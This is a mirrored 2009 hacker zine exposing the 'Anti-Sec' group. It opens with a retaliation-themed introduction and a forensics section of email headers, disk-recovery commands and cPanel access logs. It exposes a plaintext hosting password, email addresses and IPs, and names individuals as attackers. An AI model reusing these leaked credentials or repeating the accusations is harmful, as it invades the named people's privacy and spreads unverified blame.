Mirrors
/
Zines
mirror of https://github.com/fdiskyou/Zines.git
1
0
Fork 0
Code Issues Releases Wiki Activity
Zines/anti-anti-sec/anti-anti-sec.txt

11157 lines
580 KiB
Plaintext
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

__ .__
_____ _____/ |_|__| ______ ____ ____
\__ \ / \ __\ |/ ___// __ \_/ ___\
/ __ \| | \ | | |\___ \\ ___/\ \___
(____ /___| /__| |__/____ >\___ >\___ >
\/ \/ \/ \/ \/ *no more*
get yours http://www.network-science.de/ascii/
[0x00] [Introduction]
[0x01] [Forensics]
[0x02] [Target Profiling & Lulz]
[0x03] [ownage.net - prosec]
[0x04] [vitalspeeds - prosec]
[0x05] [makosolutions - prosec]
[0x06] [holeinthewallhosting - prosec]
[0x07] [darkmindz - zf05]
[0x08] [Backdoor RCE]
[0x09] [SEO Optimizing]
[0x10] [Reporting]
[0x11] [Attachments]
[0x12] [Conclusion]
[0x13] [Greetz]
_______ _______ _______
\ _ \ ___ __\ _ \ \ _ \
/ /_\ \\ \/ / /_\ \/ /_\ \
\ \_/ \> <\ \_/ \ \_/ \
\_____ /__/\_ \\_____ /\_____ /
\/ \/ \/ \/ hai:]
.___ __ .___ __ .__
| | _____/ |________ ____ __| _/_ __ _____/ |_|__| ____ ____
| |/ \ __\_ __ \/ _ \ / __ | | \_/ ___\ __\ |/ _ \ / \
| | | \ | | | \( <_> ) /_/ | | /\ \___| | | ( <_> ) | \
|___|___| /__| |__| \____/\____ |____/ \___ >__| |__|\____/|___| /
\/ \/ \/ \/
What you are about to read is the complete destruction of the "Anti-Sec" group. An organization known
as "ProSec" contacted us with reports containing information about the entire group and how it was operating.
We don't know who they are, they appear to be well-funded and top notch security experts and what
they have done against the group is invaluable to us and others that they have and or would have been targeted.
ProSec did want me to portray a message that organizations similar to the Anti-Sec will and are currently being
targeted by the movement. ProSec already has access to a number of them and are continuously monitoring and gathering
more information about the various groups and will release information when applicable. No longer should whitehats
fear these groups, as soon as an individual is targeted, they will target right back. This is a warning shot to
those out there that target us. I want to thank ProSec for the work that they continue to do and understand why this
movement is so important to the security community.
On the 4th of June 2009, a group named "Anti-Sec" decided to expose Astalavista group after
they successfully exploited what was rumored to be a Litespeed 0day exploit which in reality does not exist.
After looking up on this more and more, a couple of days later we found out that the responsible
person behind this attack was a Saudi-Arabian with the nickname RoMeO, so we decided to let the other
Astalavista staff know about our findings. Joao Pontes, one of the senior Astalavista administrators
decided to warn his friend RoMeO about it and as you will notice below Joao Pontes (rorkty) knew
from the beginning that Astalavista group was compromised by his closest friend and decided to do nothing about it.
Later, on the 9th of June one of my dedicated hosting servers, running a couple of websites was targeted
by the same "Anti-Sec" group providing fake and misleading information to the public.
The reason that we decided to start looking into this subject, was to see how and why my dedicated hosting
server was compromised despite the fact that it was secure enough to provide access to the outside world.
Below is a list of some security measures that had been taken to ensure no unauthorized access permitted:
1) Firewall Protection
2) Brute Force Detection and Prevention
3) Kernel Hardening
4) Apache, PHP, SQL Hardening
5) SSH Hardening
6) Wheel access group for su
7) Chrooted Jail Shell
8) Web Application Firewall
9) Network Intrusion Detection
10) Host Intrustion Detection
11) Hidden daemon versions
12) Rootkit Detection
13) DoS Protection
14) All private sites hosted, audited for bugs
15) Root Access Alert
16) Etc
Unfortunately the interval between compromisation of the server until the alert reports came to our attention
was not enough to prevent the attack.
After our research and the information provided by the ProSec group we came to the conclusion that the server was
either hit by an 0day exploit or through my dedicated server provider makosolutions.com which later on it shows
that they were backdoored.
Utilizing passive and active reconnaissance methods resulted to large information acquisitions which provided
us with means for linking together certain information and shade more light on who we are about to target and
research for the attacks that took place under the "Anti-Sec" label.
In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities.
_______ _______ ____
\ _ \ ___ __\ _ \/_ |
/ /_\ \\ \/ / /_\ \| |
\ \_/ \> <\ \_/ \ |
\_____ /__/\_ \\_____ /___|
\/ \/ \/
___________ .__
\_ _____/__________ ____ ____ _____|__| ____ ______
| __)/ _ \_ __ \_/ __ \ / \ / ___/ |/ ___\ / ___/
| \( <_> ) | \/\ ___/| | \\___ \| \ \___ \___ \
\___ / \____/|__| \___ >___| /____ >__|\___ >____ >
\/ \/ \/ \/ \/ \/
Email Incidents
Delivered-To: glafkos@gmail.com
Received: by 10.223.104.212 with SMTP id q20cs268734fao;
Tue, 9 Jun 2009 03:58:03 -0700 (PDT)
Received: by 10.223.113.68 with SMTP id z4mr5075866fap.72.1244545083200;
Tue, 09 Jun 2009 03:58:03 -0700 (PDT)
Return-Path: <root@freehostia.com>
Received: from freehostia.com ([66.40.52.21])
by mx.google.com with ESMTP id 27si6598826fxm.93.2009.06.09.03.58.02;
Tue, 09 Jun 2009 03:58:03 -0700 (PDT)
Received-SPF: neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) client-ip=66.40.52.21;
Authentication-Results: mx.google.com; spf=neutral (google.com: 66.40.52.21 is neither permitted nor denied by best guess record for domain of root@freehostia.com) smtp.mail=root@freehostia.com
Received: from root by freehostia.com with local (Exim 4.63)
(envelope-from <root@freehostia.com>)
id 1MDz3p-0002ME-UX
for glafkos@gmail.com; Tue, 09 Jun 2009 11:00:09 +0000
To: glafkos@gmail.com
Subject: Hosting account: Password reminder
MIME-Version: 1.0
Content-type: text/plain; charset=UTF-8
From: Free Hostia <csupport@freehostia.com>
Cc:
Reply-To:
Message-Id: <E1MDz3p-0002ME-UX@freehostia.com>
Date: Tue, 09 Jun 2009 11:00:09 +0000
Dear Glask Chwat,
at 2009-06-09 10:53:25 someone from this IP: 188.51.89.109 has requested your current password for the Control Panel.
We are sending you your account login details:
username: glachw
password: 1779586
If you have any questions, please open a new support ticket from the Help section of the Control Panel.
Best Regards,
Free Hostia Team
/*
Clearly the moron didn't think about using any kind of proxy, or maybe he just couldn't figure out how to use Tor?
As you can see above, he made this request from his home IP.
*/
Delivered-To: glafkos@gmail.com
Received: by 10.223.104.212 with SMTP id q20cs272895fao;
Tue, 9 Jun 2009 05:26:34 -0700 (PDT)
MIME-Version: 1.0
Received: by 10.216.52.194 with SMTP id e44mr23160wec.34.1244550394375; Tue,
09 Jun 2009 05:26:34 -0700 (PDT)
Date: Tue, 9 Jun 2009 15:26:34 +0300
Message-ID: <94a72b260906090526o1aaa5008o86ebfcaa5cc398c2@mail.gmail.com>
Subject: Lol.
From: james knuth <james.knuth1@gmail.com>
To: glafkos@gmail.com
Content-Type: multipart/alternative; boundary=0016e6de1524296ff7046be97868
http://pastebin.com/m592e1f1c
It will be all over the net soon,
Enjoy.
// Indeed..
Server Forensics
root@srv01 [/home/recovery]# du -h --max-depth=1
608K ./APF_Backup
992K ./Diff
224K ./Latest
3.3M ./LinkNet
46M ./log
1.2M ./modbin
7.5G ./sdb2recover
361M ./sdb3recover
371M ./sdb5recover
121M ./Software
128K ./OpenSSH_Debug
4.5G ./Evidence
15G .
root@srv01 [/home/recovery]#
// Obviously this noobcake didn't know that it was possible to recover deleted files
root@srv01 [/home/recovery]# du -h --max-depth=0 sdb* string*
416K sdb2output.txt
7.5G sdb2recover
361M sdb3recover
7.9M sdb3usrdirlist.txt
371M sdb5recover
22M sdb5tmp.txt
64K sdb8deleted_files.txt
2.5M sdb8home.txt
857M stringfile_sdb2.txt
root@srv01 [/home/recovery]#
root@srv01 [/home/recovery]# ls -lad sd*recover
drwxr-xr-x 17 root root 32768 Jun 15 16:26 sdb2recover
drwxr-xr-x 10 root root 32768 Jun 15 18:09 sdb3recover
drwxr-xr-x 4 root root 32768 Jun 15 22:59 sdb5recover
root@srv01 [/home/recovery]#
root@srv01 [/home/recovery]# ./fls -a -r -p /dev/sdb3 > sdb3usrdirlist.txt
root@srv01 [/home/recovery]# grep -i "access_log" /home/recovery/sdb3usrdirlist.txt
r/r 2195490: local/cpanel/logs/access_log
r/r * 2199010(realloc): local/cpanel/logs/access_log-cpanelsync
r/r 2362208: local/apache/logs/access_log
root@srv01 [/home/recovery]# ./icat -r -s -f ext3 /dev/sdb3 2195490 > /tmp/access_log
root@srv01 [/home/recovery]# ls -la /tmp/access_log
-rw-r--r-- 1 root root 13312000 Jun 11 03:38 /tmp/access_log
root@srv01 [/home/recovery]#
// Someone needs to learn how to cover his tracks... try... "man dd"
root@srv01 [/home/recovery]# cat /tmp/access_log | grep 188.54
188.54.114.181 - - [06/08/2009:10:59:52 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:10:59:59 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:01 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:02 -0000] "GET /unprotected/cpanel/images/log_01_webmail.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2096/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - glafkos@infosec.org.uk [06/08/2009:11:00:20 -0000] "POST /login/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2096/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET /favicon.ico HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:08 -0000] "GET / HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:12 -0000] "GET /unprotected/cpanel/style.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_02b.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:13 -0000] "GET /unprotected/cpanel/images/log_03.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/button-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:14 -0000] "GET /unprotected/cpanel/images/log_01_whm.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:16 -0000] "GET /unprotected/cpanel/favicon.ico HTTP/1.1" 200 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:27 -0000] "GET /unprotected/cpanel/images/button-bg-over.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/unprotected/cpanel/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:19:29 -0000] "POST /login/ HTTP/1.1" 301 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:32 -0000] "GET / HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=topframe.html HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command?PFILE=main HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:33 -0000] "GET /scripts/command HTTP/1.1" 0 "https://srv01.webhostline.com:2087/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994913/combined_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994907/themes/x/style_optimized.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:34 -0000] "GET /cPanel_magic_revision_1231994905/themes/x/logo.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1192071000/lock.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/serverconfig.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/support.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1231994880/js/hidecells.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/networksetup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/security.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/servercontacts.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/resellers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/languages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/backup.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/transfers.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/systemreboot.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:35 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/serverstatus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/account-info.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/account-functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/themes/x/icons/functions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/frontpage.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/themes.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/packages.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/dnsfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/sql.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/ipfunctions.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/diskdrives.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098608/themes/x/icons/software.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/email.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/health.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1231994900/yui/utilities/utilities.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/cpanel.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:36 -0000] "GET /cPanel_magic_revision_1143069318/themes/x/icons/ssl.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098607/themes/x/icons/restartservices.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=main" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1143069318/minus.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1186549335/themes/x/images/arrow-up.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1181098613/themes/x/header-bg.jpg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:19:37 -0000] "GET /cPanel_magic_revision_1192071000/themes/x/breadcrumb_bg.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
